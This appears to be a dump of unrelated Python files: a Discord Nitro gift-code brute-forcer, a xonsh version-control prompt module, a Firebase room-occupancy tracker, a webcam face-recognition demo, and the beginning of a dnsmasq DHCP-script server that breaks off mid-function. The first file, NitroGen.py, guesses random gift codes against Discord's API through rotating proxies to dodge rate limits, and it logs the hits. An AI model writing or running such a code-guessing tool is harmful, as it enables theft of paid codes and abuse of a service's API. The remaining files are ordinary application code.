forms.alert('No File is selected', title='', sub_msg=None, expanded=None, footer='', ok=True, cancel=False, yes=False,
no=False, retry=False, warn_icon=True, options=None, exitscript=False)
|
NitroGen.py
|
import requests
import string
import random
from sys import argv, exit
from threading import Thread
try:
caracteres = int(argv[1])
threads = int(argv[2])
proxys = argv[3]
except:
print('Error, Set Characters, Threads And List Proxys!!!')
exit()
proxys = open(proxys, 'r')
proxys = proxys.readlines()
def getandchk(caracteres, proxys):
while True:
for proxy in proxys:
try:
proxya = proxy.strip()
proxy = {'https': proxya}
header = {'user-agent': 'Mozilla/5.0'}
code = ('').join(random.choices(string.ascii_letters + string.digits, k=caracteres))
url = ('https://discordapp.com/api/v6/entitlements/gift-codes/{0}?with_application=false&with_subscription_plan=true'.format(code))
r = requests.get(url=url, proxies=proxy, headers=header, timeout=24)
if 'Unknown' in r.text:
print('#Die', code, proxya)
else:
save = open('goodnitro.txt', 'a')
save.write('#Live', code, proxya)
save.close()
print('#Live', code, proxya)
except:
print('#Error', code, proxya)
for i in range(threads):
t = Thread(target=getandchk, args=(caracteres, proxys))
t.start()
t.join(0.5)
|
vc.py
|
# -*- coding: utf-8 -*-
"""Prompt formatter for simple version control branches"""
# pylint:disable=no-member, invalid-name
import os
import sys
import queue
import builtins
import threading
import subprocess
import re
import pathlib
import xonsh.tools as xt
from xonsh.lazyasd import LazyObject
RE_REMOVE_ANSI = LazyObject(
lambda: re.compile(r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]"),
globals(),
"RE_REMOVE_ANSI",
)
def _get_git_branch(q):
denv = builtins.__xonsh__.env.detype()
try:
cmd = ["git", "rev-parse", "--abbrev-ref", "HEAD"]
branch = xt.decode_bytes(
subprocess.check_output(cmd, env=denv, stderr=subprocess.DEVNULL)
)
branch = branch.splitlines()[0] or None
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
q.put(branch)
def get_git_branch():
"""Attempts to find the current git branch. If this could not
be determined (timeout, not in a git repo, etc.) then this returns None.
"""
branch = None
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(target=_get_git_branch, args=(q,))
t.start()
t.join(timeout=timeout)
try:
branch = q.get_nowait()
if branch:
branch = RE_REMOVE_ANSI.sub("", branch)
except queue.Empty:
branch = None
return branch
def _get_hg_root(q):
_curpwd = builtins.__xonsh__.env["PWD"]
while True:
if not os.path.isdir(_curpwd):
return False
try:
dot_hg_is_in_curwd = any([b.name == ".hg" for b in xt.scandir(_curpwd)])
except OSError:
return False
if dot_hg_is_in_curwd:
q.put(_curpwd)
break
else:
_oldpwd = _curpwd
_curpwd = os.path.split(_curpwd)[0]
if _oldpwd == _curpwd:
return False
def get_hg_branch(root=None):
"""Try to get the mercurial branch of the current directory,
return None if not in a repo or subprocess.TimeoutExpired if timed out.
"""
env = builtins.__xonsh__.env
timeout = env["VC_BRANCH_TIMEOUT"]
q = queue.Queue()
t = threading.Thread(target=_get_hg_root, args=(q,))
t.start()
t.join(timeout=timeout)
try:
root = pathlib.Path(q.get_nowait())
except queue.Empty:
return None
if env.get("VC_HG_SHOW_BRANCH"):
# get branch name
branch_path = root / ".hg" / "branch"
if branch_path.exists():
with open(branch_path, "r") as branch_file:
branch = branch_file.read().strip()
else:
branch = "default"
else:
branch = ""
# add activated bookmark and topic
for filename in ["bookmarks.current", "topic"]:
feature_branch_path = root / ".hg" / filename
if feature_branch_path.exists():
with open(feature_branch_path) as file:
feature_branch = file.read().strip()
if feature_branch:
if branch:
if filename == "topic":
branch = f"{branch}/{feature_branch}"
else:
branch = f"{branch}, {feature_branch}"
else:
branch = feature_branch
return branch
_FIRST_BRANCH_TIMEOUT = True
def _first_branch_timeout_message():
global _FIRST_BRANCH_TIMEOUT
sbtm = builtins.__xonsh__.env["SUPPRESS_BRANCH_TIMEOUT_MESSAGE"]
if not _FIRST_BRANCH_TIMEOUT or sbtm:
return
_FIRST_BRANCH_TIMEOUT = False
print(
"xonsh: branch timeout: computing the branch name, color, or both "
"timed out while formatting the prompt. You may avoid this by "
"increasing the value of $VC_BRANCH_TIMEOUT or by removing branch "
"fields, like {curr_branch}, from your $PROMPT. See the FAQ "
"for more details. This message will be suppressed for the remainder "
"of this session. To suppress this message permanently, set "
"$SUPPRESS_BRANCH_TIMEOUT_MESSAGE = True in your xonshrc file.",
file=sys.stderr,
)
def _vc_has(binary):
""" This allows us to locate binaries after git only if necessary """
cmds = builtins.__xonsh__.commands_cache
if cmds.is_empty():
return bool(cmds.locate_binary(binary, ignore_alias=True))
else:
return bool(cmds.lazy_locate_binary(binary, ignore_alias=True))
def current_branch():
"""Gets the branch for a current working directory. Returns an empty string
if the cwd is not a repository. This currently only works for git and hg
and should be extended in the future. If a timeout occurred, the string
'<branch-timeout>' is returned.
"""
branch = None
if _vc_has("git"):
branch = get_git_branch()
if not branch and _vc_has("hg"):
branch = get_hg_branch()
if isinstance(branch, subprocess.TimeoutExpired):
branch = "<branch-timeout>"
_first_branch_timeout_message()
return branch or None
def _get_exit_code(cmd):
""" Run a command and return its exit code """
denv = builtins.__xonsh__.env.detype()
child = subprocess.run(cmd, stderr=subprocess.DEVNULL, env=denv)
return child.returncode
def _git_dirty_working_directory(q, include_untracked):
try:
# Borrowed from this conversation
# https://gist.github.com/sindresorhus/3898739
if include_untracked:
cmd = [
"git",
"status",
"--porcelain",
"--quiet",
"--untracked-files=normal",
]
exitcode = _get_exit_code(cmd)
else:
# checking unindexed files is faster, so try that first
unindexed = ["git", "diff-files", "--quiet"]
exitcode = _get_exit_code(unindexed)
if exitcode == 0:
# then, check indexed files
indexed = ["git", "diff-index", "--quiet", "--cached", "HEAD"]
exitcode = _get_exit_code(indexed)
# "--quiet" git commands imply "--exit-code", which returns:
# 1 if there are differences
# 0 if there are no differences
dwd = bool(exitcode)
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
q.put(dwd)
def git_dirty_working_directory(include_untracked=False):
"""Returns whether or not the git directory is dirty. If this could not
be determined (timeout, file not found, etc.) then this returns None.
"""
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(
target=_git_dirty_working_directory, args=(q, include_untracked)
)
t.start()
t.join(timeout=timeout)
try:
return q.get_nowait()
except queue.Empty:
return None
def hg_dirty_working_directory():
"""Computes whether or not the mercurial working directory is dirty or not.
If this cannot be determined, None is returned.
"""
env = builtins.__xonsh__.env
cwd = env["PWD"]
denv = env.detype()
vcbt = env["VC_BRANCH_TIMEOUT"]
# Override user configurations settings and aliases
denv["HGRCPATH"] = ""
try:
s = subprocess.check_output(
["hg", "identify", "--id"],
stderr=subprocess.PIPE,
cwd=cwd,
timeout=vcbt,
universal_newlines=True,
env=denv,
)
return s.strip(os.linesep).endswith("+")
except (
subprocess.CalledProcessError,
subprocess.TimeoutExpired,
FileNotFoundError,
):
return None
def dirty_working_directory():
"""Returns a boolean as to whether there are uncommitted files in version
control repository we are inside. If this cannot be determined, returns
None. Currently supports git and hg.
"""
dwd = None
if _vc_has("git"):
dwd = git_dirty_working_directory()
if dwd is None and _vc_has("hg"):
dwd = hg_dirty_working_directory()
return dwd
def branch_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are bold, intense colors
for the foreground.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BOLD_INTENSE_YELLOW}"
elif dwd:
color = "{BOLD_INTENSE_RED}"
else:
color = "{BOLD_INTENSE_GREEN}"
return color
def branch_bg_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are background colors.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BACKGROUND_YELLOW}"
elif dwd:
color = "{BACKGROUND_RED}"
else:
color = "{BACKGROUND_GREEN}"
return color
|
test.py
|
import firebase_admin
import datetime
from firebase_admin import credentials
from firebase_admin import firestore
from google.cloud.firestore_v1beta1 import ArrayUnion
import threading
import time
cred = credentials.Certificate("firebase_key.json")
firebase_admin = firebase_admin.initialize_app(cred)
db = firestore.client()
def get_fire_pir_in():
ref_pir_in = db.collection('PIR_IN')
docs_pir_in = ref_pir_in.get()
return docs_pir_in
def get_fire_pir_out():
ref_pir_out = db.collection('PIR_OUT')
docs_pir_out = ref_pir_out.get()
return docs_pir_out
def get_D1():
ref_d1 = db.collection('D1')
docs_d1 = ref_d1.get()
return docs_d1
def get_D2():
ref_d2 = db.collection('D2')
docs_d2 = ref_d2.get()
return docs_d2
def get_averages():
average_doc = db.collection('AUX').document('AVERAGES').get()
return average_doc.to_dict()
def get_most_popular_time_of_today():
popular_time = db.collection('AUX').document('MOST_POPULAR_TIME_OF_TODAY').get()
return popular_time.to_dict()
#Get people that went into the room throughout the whole day
def get_number_of_people_in_today():
date_now = datetime.datetime.now()
sum = 0
docs_pir_in = get_fire_pir_in()
for doc in docs_pir_in:
if (doc.id == date_now.strftime("%Y%m%d")):
for key,value in doc.to_dict().items():
sum += int(value)
return sum
#Get people that went out of the room throughout the whole day
def get_number_of_people_out_today():
date_now = datetime.datetime.now()
sum = 0
docs_pir_out = get_fire_pir_out()
for doc in docs_pir_out:
if(doc.id == date_now.strftime("%Y%m%d")):
for key,value in doc.to_dict().items():
sum += int(value)
return sum
#Gets people that went in at the current hour
def get_number_of_people_in_current_hour():
date_now = datetime.datetime.now()
sum = 0
time_now = date_now.strftime("%H%M%S")
docs_pir_in = get_fire_pir_in()
for doc in docs_pir_in:
if (doc.id == date_now.strftime("%Y%m%d")):
for key,value in doc.to_dict().items():
if (key[:2] == time_now[:2]):
sum += int(value)
return sum
#Update TOTALTODAY for the day today
def update_people_total_in_today():
date_now = datetime.datetime.now()
people_in_today = get_number_of_people_in_today()
print("In the function, number of people is : {}".format(people_in_today))
data = {"TOTALTODAY" : people_in_today}
db.collection('PROCESSED_IN').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
def update_pir_things():
distance1_map = get_D1()
distance2_map = get_D2()
for distance1 in distance1_map:
distance2_map = get_D2()
for distance2 in distance2_map:
if (distance1.id == distance2.id): #Same date
dist_date = distance1.id
print("In same date, {}".format(dist_date))
distance1_dict = distance1.to_dict()
for key1, value1 in list(distance1_dict.items()):
time1 = key1
print("Looping inside list 1")
print("Time 1 is : {}".format(time1))
distance2_dict = distance2.to_dict()
for key2,value2 in list(distance2_dict.items()):
print("Looping inside list 2")
time2 = key2
print("Time 2 is : {}".format(time2))
gap = int(time1) - int(time2)
print("gap is {}".format(gap))
if (gap <=200000 and gap >= 0): #2000 ms gap should be good I think
date_now = datetime.datetime.now()
doc_name = date_now.strftime("%Y%m%d")
time = date_now.strftime("%H%M%S")
data = {time : 1}
db.collection('PIR_IN').document(doc_name).set(data, merge=True)
db.collection('D1').document(dist_date).update({key1 : firestore.DELETE_FIELD})
db.collection('D2').document(dist_date).update({key2 : firestore.DELETE_FIELD})
try:
distance1_dict.pop(time1)
distance2_dict.pop(time2)
except:
print("Caught")
break
elif (gap >= -200000 and gap <= 0):
print("Met second cond")
date_now = datetime.datetime.now()
doc_name = date_now.strftime("%Y%m%d")
time = date_now.strftime("%H%M%S")
data = {time : 1}
db.collection('PIR_OUT').document(doc_name).set(data, merge=True)
db.collection('D1').document(dist_date).update({key1 : firestore.DELETE_FIELD})
db.collection('D2').document(dist_date).update({key2 : firestore.DELETE_FIELD})
try:
distance1_dict.pop(time1)
distance2_dict.pop(time2)
except:
print("Caught")
break
#Update the Hourly field of today
def update_people_total_in_current_hour():
date_now = datetime.datetime.now()
people_in_current_hour = get_number_of_people_in_current_hour()
data = {"HOURLY" : {(date_now.strftime("%H") + "00") : people_in_current_hour}}
db.collection('PROCESSED_IN').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
def update_people_quarter_in_current_hour():
date_now = datetime.datetime.now()
people_in_current_hour = get_number_of_people_in_current_hour()
data = {"QUARTERLY" : {date_now.strftime("%H%M") : people_in_current_hour }}
db.collection('PROCESSED_IN').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
print("In the function, number of people IN quarter is {}".format(people_in_current_hour))
#Gets people that went in at the current hour
def get_number_of_people_out_current_hour():
date_now = datetime.datetime.now()
sum = 0
time_now = date_now.strftime("%H%M%S")
docs_pir_out = get_fire_pir_out()
for doc in docs_pir_out:
if (doc.id == date_now.strftime("%Y%m%d")):
for key,value in doc.to_dict().items():
if (key[:2] == time_now[:2]):
sum += int(value)
return sum
def update_time_averages():
date_now = datetime.datetime.now()
people_in = db.collection('PROCESSED_IN').document(date_now.strftime("%Y%m%d")).get()
sum_in = 0
people_out = db.collection('PROCESSED_OUT').document(date_now.strftime("%Y%m%d")).get()
for items in people_in.to_dict().items():
print("ITEM : {}".format(items))
if (items[0] == "QUARTERLY"):
print("ITEMS 11 : {}".format(items[1]))
for key, value in items[1].items():
print("VAL : {}, {}".format(key, value))
if (key[:2] == date_now.strftime("%H")):
print("Updating current average for current time")
sum_in += int(value)
sum_out = 0
for items in people_out.to_dict().items():
if (items[0] == "QUARTERLY"):
print("IEMS 1 : {}".format(items[1]))
for key, value in items[1].items():
print("HASAKEY : {}".format(value))
if (key[:2] == date_now.strftime("%H")):
sum_out += int(value)
print("SUM IN {}".format(sum_in))
print("SUM OUT {}".format(sum_out))
sum = sum_in - sum_out
if (sum < 0):
sum = 0
print("Sum is {}".format(sum))
data = {(date_now.strftime("%H:") + "00") : sum}
db.collection('AUX').document('TODAY').set(data, merge=True)
#Update TOTALTODAY for the day today
def update_people_total_out_today():
date_now = datetime.datetime.now()
people_out_today = get_number_of_people_out_today()
data = {"TOTALTODAY" : people_out_today}
db.collection('PROCESSED_OUT').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
#Update the Hourly field of today
def update_people_total_out_current_hour():
date_now = datetime.datetime.now()
people_out_current_hour = get_number_of_people_out_current_hour()
data = {"HOURLY" : {(date_now.strftime("%H") + "00") : people_out_current_hour}}
db.collection('PROCESSED_OUT').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
#Update the quarter of people, only call this function every 15 minutes
def update_people_quarter_out_current_hour():
date_now = datetime.datetime.now()
people_out_current_hour = get_number_of_people_out_current_hour()
data = {"QUARTERLY" : {date_now.strftime("%H%M") : people_out_current_hour }}
db.collection('PROCESSED_OUT').document(date_now.strftime("%Y%m%d")).set(data, merge=True)
def get_current_occupancy():
current_people = (get_number_of_people_in_today()) - (get_number_of_people_out_today())
return current_people
def update_todays_averages():
day_today = datetime.datetime.now().strftime("%A")
print("Today is {}".format(day_today))
averages = get_averages()
average_in_db = averages[day_today]
new_average = (int(average_in_db) + int(get_number_of_people_in_today()))/2
data = {day_today : new_average}
db.collection('AUX').document('AVERAGES').update(data)
def update_current_occupancy():
current_occupancy = get_current_occupancy()
data = {'CURRENT_OCCUPANCY' : current_occupancy}
db.collection('AUX').document('TODAY').update(data)
def update_most_popular_time():
current_occupancy = get_current_occupancy()
most_popular_time = get_most_popular_time_of_today()
if (current_occupancy > int(list(most_popular_time.values())[0])):
time_now = datetime.datetime.now().strftime("%H%M%S")
data = {time_now : current_occupancy}
db.collection('AUX').document('MOST_POPULAR_TIME_OF_TODAY').set(data, merge=True)
def update_people_in_today():
people_today = get_number_of_people_in_today()
data = {'NUMBER_OF_PEOPLE_IN_TODAY' : people_today}
db.collection('AUX').document('TODAY').update(data)
def update_people_out_today():
people_today = get_number_of_people_out_today()
data = {'NUMBER_OF_PEOPLE_OUT_TODAY' : people_today}
db.collection('AUX').document('TODAY').update(data)
quarterly_time_list = ['00','15','30','45']
def update_every_1_mins():
while True:
print('Running the minute thread......')
date_now_minute = datetime.datetime.now().strftime("%M")
update_pir_things()
if (date_now_minute in quarterly_time_list):
print("Updating the value in db")
update_people_quarter_in_current_hour()
update_people_quarter_out_current_hour()
update_todays_averages()
update_current_occupancy()
update_people_in_today()
update_people_out_today()
update_most_popular_time()
time.sleep(60*2)
quarterly_thread = threading.Thread(target=update_every_1_mins, args=[]) #Try to do quarterly in a seperate thread
#secondly_thread = threading.Thread(target=update_every_10_seconds, args=[])
#secondly_thread.start()
quarterly_thread.start()
while True:
print('Running main loop......')
update_people_total_in_today()
update_people_total_in_current_hour()
update_people_total_out_today()
update_people_total_out_current_hour()
update_time_averages()
time.sleep(60*15)
|
facerec_from_webcam_mult_thread.py
|
# !/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @author breeze
import threading
import argparse
import multiprocessing
import time
from multiprocessing import Queue, Pool
import face_recognition
import pandas as pd
import win32com.client
import cv2
import encoding_images
from app_utils import *
# This is a demo of running face recognition on live video from your webcam. It's a little more complicated than the
# other example, but it includes some basic performance tweaks to make things run a lot faster:
# 1. Process each video frame at 1/4 resolution (though still display it at full resolution)
# 2. Only detect faces in every other frame of video.
# PLEASE NOTE: This example requires OpenCV (the `cv2` library) to be installed only to read from your webcam.
# OpenCV is *not* required to use the face_recognition library. It's only required if you want to run this
# specific demo. If you have trouble installing it, try any of the other demos that don't require it instead.
# Load a sample picture and learn how to recognize it.
# face_recognition.api.batch_face_locations(images, number_of_times_to_upsample=1, batch_size=128)[source]
# face_recognition.api.compare_faces(known_face_encodings, face_encoding_to_check, tolerance=0.6)
# face_recognition.api.face_distance(face_encodings, face_to_compare)[source]
# face_recognition.api.face_encodings(face_image, known_face_locations=None, num_jitters=1)[source]
# face_recognition.api.face_landmarks(face_image, face_locations=None)[source]
# face_recognition.api.face_locations(img, number_of_times_to_upsample=1, model='hog')[source]
# face_recognition.api.load_image_file(file, mode='RGB')[source]
# 语音模块 voice model
speaker = win32com.client.Dispatch("SAPI.SpVoice")
name = "Unknown"
current_names = [name]
last_time = time.time()
known_face_names = []
known_face_encodings = []
known_face_encodings, known_face_names = encoding_images.load_encodings()
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True #
TIME_DIFF = 20 # 持久化的时间间隔,当设置为 0 时候,每次识别的结果直接进行保存.
name_record = "./dataset/face_record.txt" # 持久化识别出的人脸结果
NAME_DF = pd.DataFrame(known_face_names, columns=["name"])
last_ts = time.time()
lock = threading.Lock()
def myprint(log, ts):
global lock, last_ts
if lock.acquire():
diff = ts - last_ts
print(log, '--------', diff)
last_ts = ts
lock.release()
def process_face_records(name):
"""
处理每一条识别的记录 ,并在一定时间之后将数据持久化到文件中
此处会碰到全局并发,导致锁的问题
:param name:
:return:
"""
return
print('process_face_records start', time.time())
global current_names, last_time
# myprint("global current_names {}, last_time {}".format(current_names, last_time))
# 判断是不是在识别的列表中,不在的话就进行问候
if name not in current_names:
print("ts ====", last_time, time.time())
current_names.append(name)
myprint("Hello {}, nice to meet you! ".format(name))
# speaker.Speak("Hello {}, nice to meet you! ".format(name))
# 在一定时间内,清空已经识别的人, 并进行
if last_time < time.time() - TIME_DIFF: # 每隔一段时间清空一下检测到的人
last_time = time.time()
time_format = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
myprint(time_format + " update last_time and clear current_names.")
with open(name_record, 'a') as f:
if len(current_names) > 0:
f.writelines("{}:{} \n".format(time_format, str(current_names)))
print("======", current_names)
current_names = [] # clear()
current_names = [name]
myprint('process_face_records end', time.time())
def vote_class(face_encoding, tolerance=0.3, topN=5):
myprint('vote start ', time.time())
"""
当比较的结果小于tolerance的时候,有多个值,采用取topN 进行投票 ,决定最终的分类,此处没有对 distance 距离进行加权
:param face_encoding: face encoding
:param tolerance: 距离的阈值,越小越相似
:param topN: 参与投票的最大数量
:return: detect name
"""
# 计算出距离
distance_ = face_recognition.face_distance(known_face_encodings, face_encoding)
df = pd.DataFrame(distance_, columns=["dis"]) # 转换成 DataFrame
topDF = df[df['dis'] <= tolerance].nsmallest(topN, columns=['dis']) # 过滤结果集
namedf = NAME_DF.loc[topDF.index] # 从姓名列表中获取face距离对应的人脸名称
con = pd.concat([topDF, namedf], axis=1) # concat name and distance
# print('con', con)
group = con.groupby(["name"])['dis'].sum()
gp = group.reset_index()
print('vote -- ', gp)
if len(gp) == 0:
print("------unknown -----")
return "Unknown", 10
import numpy as np # TODO optimize
arr = np.array(gp)
name1 = arr[0, 0]
dis1 = arr[0, 1]
print("get top one:", name1, dis1)
myprint('vote end', time.time())
return name1, dis1
def face_process(frame):
# Resize frame of video to 1/4 size for faster face recognition processing
myprint("face process resize start", time.time())
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
myprint("face process small_frame start", time.time())
rgb_small_frame = small_frame[:, :, ::-1]
# Find all the faces and face encodings in the current frame of video
# face_locations = face_recognition.face_locations(rgb_small_frame, model="cnn")
myprint('face_locations start', time.time())
face_locations = face_recognition.face_locations(rgb_small_frame, model="hog")
myprint('face_locations end', time.time())
myprint('face_encodings start', time.time())
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
myprint('face_encodings end', time.time())
face_names = []
for face_encoding in face_encodings:
# optimize start 采用KNN 排名*权重, 在类别上进行叠加,然后排序取出top1
name, dis = vote_class(face_encoding)
# optimize end 采用 排名*权重, 在类别上进行叠加,然后排序取出top1
face_names.append(name) # 将人脸数据
# Display the results
for (top, right, bottom, left), name in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
myprint('putText start', time.time())
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
myprint("putText end " + name, time.time())
# say hello and save record to file
myprint('process_face_records start', time.time())
process_face_records(name)
myprint('process_face_records end', time.time())
# Display the resulting image
# cv2.imshow('Video', frame)
myprint("face process end", time.time())
return frame
def worker(input_q, output_q):
# Load a (frozen) Tensorflow model into memory.
fps = FPS().start()
while True:
myprint("updata start ", time.time())
fps.update()
myprint("updata end ", time.time())
# global lock
# if lock.acquire():
# lock.release()
frame = input_q.get()
myprint("out queue {} and input que size {} after input_q get".format(output_q.qsize(), input_q.qsize()), time.time())
myprint("out queue {} and input que size {} after lock release ".format(output_q.qsize(), input_q.qsize()), time.time())
myprint("face process start", time.time())
# frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
out_frame = face_process(frame)
myprint("out queue {} and input que size {}".format(output_q.qsize(), input_q.qsize()), time.time())
output_q.put(out_frame)
myprint("out queue {} and input que size {} ".format(output_q.qsize(), input_q.qsize()), time.time())
fps.stop()
if __name__ == '__main__':
width = 640
height = 480
num_workers = 3
queue_size = 5
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=width, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=height, help='Height of the frames in the video stream.')
parser.add_argument('-num-w', '--num-workers', dest='num_workers', type=int,
default=num_workers, help='Number of workers.')
parser.add_argument('-q-size', '--queue-size', dest='queue_size', type=int,
default=queue_size, help='Size of the queue.')
args = parser.parse_args()
logger = multiprocessing.log_to_stderr()
logger.setLevel(multiprocessing.SUBDEBUG)
input_q = Queue(maxsize=args.queue_size)
output_q = Queue(maxsize=args.queue_size)
pool = Pool(args.num_workers, worker, (input_q, output_q))
# Get a reference to webcam #0 (the default one)
# video_capture = cv2.VideoCapture(0)
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
fps = FPS().start()
# while video_capture.isOpened():
while True:
# Grab a single frame of video
# ret, frame = video_capture.read()
myprint("out queue {} and input que size {} video_capture start ".format(output_q.qsize(), input_q.qsize()), time.time())
frame = video_capture.read()
myprint("out queue {} and input que size {} ".format(output_q.qsize(), input_q.qsize()), time.time())
input_q.put(frame)
myprint("out queue {} and input que size {} ".format(output_q.qsize(), input_q.qsize()), time.time())
# Only process every other frame of video to save time
if process_this_frame:
# COLOR_RGB2BGR
myprint("out queue {} and input que size {} ".format(output_q.qsize(), input_q.qsize()), time.time())
cv2.imshow("aa", output_q.get())
myprint("out queue {} and input que size {} after imshow ".format(output_q.qsize(), input_q.qsize()),
time.time())
# cv2.imshow("aa", frame)
fps.update()
# face_process(rgb_small_frame)
# output_rgb = cv2.cvtColor(output_q.get(), cv2.COLOR_RGB2BGR)
# t = threading.Thread(target=face_process, name='face_process') # 线程对象.
# t.start() # 启动.
# process_this_frame = not process_this_frame
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
pool.terminate()
# Release handle to the webcam
video_capture.release()
cv2.destroyAllWindows()
|
server.py
|
import array
import contextlib
import ctypes
import fcntl
import io
import logging
import mmap
import os
import signal
import socket
import socketserver
import struct
import sys
import threading
from collections.abc import Container
from itertools import chain, repeat
from typing import Dict, Generator, List, Optional, Sequence, Tuple, TypeVar, TextIO
from hades.bin.dhcp_script import Context, create_parser, dispatch_commands
from hades.common.signals import install_handler
logger = logging.getLogger(__name__)
SIZEOF_INT = ctypes.sizeof(ctypes.c_int)
memfd_create = ctypes.cdll.LoadLibrary("libc.so.6").memfd_create
MFD_CLOEXEC = 1
T = TypeVar('T')
Parser = Generator[int, Tuple[mmap.mmap, int], T]
class BaseParseError(Exception):
def __init__(
self,
*args,
element: Optional[str] = None,
offset: Optional[int] = None,
) -> None:
self.element = element
self.offset = offset
super().__init__(*args, element, offset)
def _prefix(self) -> str:
offset, element = self.offset, self.element
return "".join([
"" if offset is None else "at offset {}: ".format(offset),
"" if element is None else "while parsing {}: ".format(element),
]).capitalize()
def with_element(self, element: str):
self.element = element
return self
def with_offset(self, offset: int):
self.offset = offset
return self
class ParseError(BaseParseError):
def __init__(
self,
message: str,
*,
element: Optional[str] = None,
offset: Optional[int] = None,
) -> None:
self.element = element
self.offset = offset
self.message = message
super().__init__(message, element=element, offset=offset)
def __str__(self) -> str:
return self._prefix() + self.message
class UnexpectedEOFError(BaseParseError):
def __init__(
self,
needed: int,
available: int,
*,
element: Optional[str] = None,
offset: Optional[int] = None,
) -> None:
self.needed = needed
self.available = available
super().__init__(
needed,
available,
element=element,
offset=offset,
)
def __str__(self) -> str:
return (
"{}Unexpected end of file, expected at least {} more byte(s), "
"but only {} byte(s) left."
.format(self._prefix(), self.needed, self.available)
)
class BufferTooSmallError(BaseParseError):
def __init__(
self,
needed: int,
available: int,
*,
element: Optional[str] = None,
offset: Optional[int] = None,
) -> None:
self.needed = needed
self.available = available
super().__init__(
needed,
available,
element=element,
offset=offset,
)
def __str__(self) -> str:
return (
"{}Parser requires more data ({}) than can be buffered ({})."
.format(self._prefix(), self.needed, self.available)
)
class ProtocolError(Exception):
pass
class Server(socketserver.UnixStreamServer):
"""
Process :program:`dnsmasq` :option:`--dhcp-script` invocations.
:program:`dnsmasq` can notify external tools about DHCP lease activity and
even maintain a completely external lease database, if additionally
:option:`--leasefile-ro` is specified. We use this mechanism to store the
leases in the database.
Starting a Python script that connects to a PostgreSQL database for DHCP
lease activity of dnsmasq is too slow however:
* The Python interpreter has some startup latency, but more importantly
setuptools console scripts have a very long startup time (>1s) due to
`this issue <https://github.com/pypa/setuptools/issues/510>`_.
* PostgreSQL forks for every connection.
To alleviate these issues we use a small and quick C client that passes its
command-line arguments, environment variables and file descriptors over a
UNIX socket to a long running Python server application that's permanently
connected to the database. The server is single threaded and will only
handle a single request at a time, because :program:`dnsmasq` itself is
single threaded.
The protocol is as follows:
* We use a SOCK_STREAM AF_UNIX socket, so that the client knows on the
socket level, when server has received all data and finished handling the
request.
* At first the client sends all data to server. The data may not exceed
:py:code:`mmap.PAGESIZE - 1`. The content of the data is as follows:
1. The first bytes are the number of arguments (:c:data:`argc`) as
native type :c:type:`int`.
2. This is followed by the contents of :c:data:`argv` as a series of
zero terminated strings.
3. After that the number of environment variables, that start with the
prefix :envvar:`DNSMASQ_*` as native type :c:type:`int`.
4. Followed by the actual environment variables as a series of zero
terminated strings.
* The three standard file descriptors stdin, stdout, and stderr of the
script should be passed with data at some point in time via a
:c:data:`SCM_RIGHTS` control message.
* After all data has been sent, the client shuts down its write end of the
connection and signals the server thereby, that it can begin processing
the message.
* The server will process the message and if necessary read additional data
from the passed stdin file descriptor and write data to the passed stdout
and stderr file descriptors.
* After it has processed the message, the server sends a single byte status
code between 0 and 127 and will close the connection. The script will
exit with the status code.
"""
max_packet_size = mmap.PAGESIZE - 1
def __init__(self, sock, engine):
self.parser = create_parser(standalone=False)
self.engine = engine
server_address = sock.getsockname()
super().__init__(
server_address, self._request_handler, bind_and_activate=False,
)
self.socket = sock
# Leave one byte extra for trailing zero byte
# TODO: With Python 3.8 a memfd can be opened and mapped twice:
# writable and readonly
fd = memfd_create(b"buffer", MFD_CLOEXEC)
os.ftruncate(fd, self.max_packet_size + 1)
self.buffer = mmap.mmap(
fd,
self.max_packet_size + 1,
mmap.MAP_PRIVATE,
mmap.PROT_READ | mmap.PROT_WRITE,
)
def _request_handler(
self,
request: socket.socket,
client_address,
server: socketserver.BaseServer,
):
assert self == server
logger.debug("Received new request from %s", client_address)
(stdin, stdout, stderr), args, env = self._receive(request)
status = os.EX_SOFTWARE
try:
status = self._process(stdin, stdout, stderr, args, env)
finally:
stdout.flush()
stderr.flush()
request.send(status.to_bytes(1, sys.byteorder))
def _receive(
self,
request: socket.socket,
) -> Tuple[Tuple[TextIO, TextIO, TextIO], List[bytes], Dict[bytes, bytes]]:
streams: List[TextIO] = []
# Offset of the buffer relative to the input stream
offset = 0
# Number of filled bytes in the buffer
available = 0
# Initialize parser
buffer = self.buffer
